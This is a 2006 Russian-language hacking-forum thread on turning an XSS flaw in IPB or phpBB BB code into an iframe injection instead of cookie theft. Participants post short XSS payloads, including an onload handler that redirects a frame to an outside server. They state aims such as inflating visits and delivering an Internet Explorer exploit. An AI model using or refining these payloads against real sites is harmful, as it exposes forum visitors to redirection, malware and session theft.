HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

iframe вместо ссылки на снифер
  #1  
Старый 10.01.2006, 21:20
ilyha
Познающий
Регистрация: 10.11.2005
Сообщений: 75
Провел на форуме:
367531

Репутация: 4
Lightbulb iframe вместо ссылки на снифер

Вот возникла идея, а можно ли, изменить XSS BB код того же IPB или PHPBB таким образом, чтобы не куки воровать, а вместо ссылки на снифер браузером открывшего страницу юзера обрабатывался iframe тег, ну и соответственно открывалась страничка в этом ifram'е. Советы и примеры принимаются в любых колличествах )
 
Ответить с цитированием

  #2  
Старый 11.01.2006, 06:04
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
Провел на форуме:
584821

Репутация: 83
По умолчанию

Мде, это уже называется раскрутка, да конечно возможно))) Нужно посидеть подумать может чтонить придумаю!
 
Ответить с цитированием

  #3  
Старый 11.01.2006, 12:34
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию

Можно. А какие советы или примеры тебе нужны?
__________________
+ (это не крестик, это плюсик!)
__________________


 
Ответить с цитированием

  #4  
Старый 11.01.2006, 21:45
ilyha
Познающий
Регистрация: 10.11.2005
Сообщений: 75
Провел на форуме:
367531

Репутация: 4
По умолчанию

Да, было бы неплохо, хотя бы один примерчик )
 
Ответить с цитированием

  #5  
Старый 11.01.2006, 23:34
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию

Цитата:
Сообщение от ilyha  
Да, было бы неплохо, хотя бы один примерчик )
Нет уж. Давай-ка лучше сам спрашивай, а мы поможем (точнее - подскажем, точнее - намекнем).
__________________
+ (это не крестик, это плюсик!)
__________________


 
Ответить с цитированием

  #6  
Старый 15.01.2006, 16:43
mixas
Новичок
Регистрация: 15.01.2006
Сообщений: 10
Провел на форуме:
9353

Репутация: 0
По умолчанию

Столкнулся с той же проблемой.
Например срабатывает такое XSS:
Код:
<image src="a.jpg" onload=alert();>
Нужно вставить фрейм, пробовал так:
Код:
<image src="a.jpg" onload=document.frames[0].location.href="http://server.ru">
Но чтобы это сработало, нужно, чтобы страница содержала какой нибудь другой фрейм.
Подскажите, пожалуйста, как это еще можно осуществить.
 
Ответить с цитированием

  #7  
Старый 16.01.2006, 03:59
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524

Репутация: 9
По умолчанию

Цитата:
Сообщение от mixas  
Код:
<image src="a.jpg" onload=alert();>
Нужно вставить фрейм, пробовал так:
Код:
<image src="a.jpg" onload=document.frames[0].location.href="http://server.ru">
А не легче : <img src="javascript:alert()">
 
Ответить с цитированием

  #8  
Старый 15.01.2006, 16:55
Cronyal
Познающий
Регистрация: 07.01.2006
Сообщений: 35
Провел на форуме:
50897

Репутация: 3
По умолчанию

диалер чтоли вставить хочешь?))))
 
Ответить с цитированием

  #9  
Старый 15.01.2006, 18:56
mixas
Новичок
Регистрация: 15.01.2006
Сообщений: 10
Провел на форуме:
9353

Репутация: 0
По умолчанию

Ну от банальной накрутки посещений до эксплоита под Ie.
 
Ответить с цитированием

  #10  
Старый 15.01.2006, 19:07
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

не совсем уверен про что ты говоришь, но поробуй прочитать http://antichat.ru/txt/hmail/ про mail.ru, там как раз фрейм
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.